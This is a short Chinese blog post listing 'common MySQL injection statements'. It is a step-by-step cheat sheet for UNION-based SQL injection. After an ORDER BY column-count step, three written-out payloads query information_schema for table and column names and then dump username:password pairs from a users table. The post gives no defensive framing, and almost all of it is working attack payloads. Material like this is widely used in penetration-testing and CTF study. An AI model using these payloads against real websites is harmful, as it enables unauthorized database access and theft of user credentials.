返回顶部

常用mysql注入语句

1、利用order by 判断字段数。


2、利用union select 联合查询,获取表名。

0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、利用union select 联合查询,获取字段名。

0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、利用union select 联合查询,获取字段值。

0' union select 1,group_concat(username,0x3a,password),3 from users--+

 

posted @ 2020-05-11 18:57  御用闲人  阅读(123)  评论(0编辑  收藏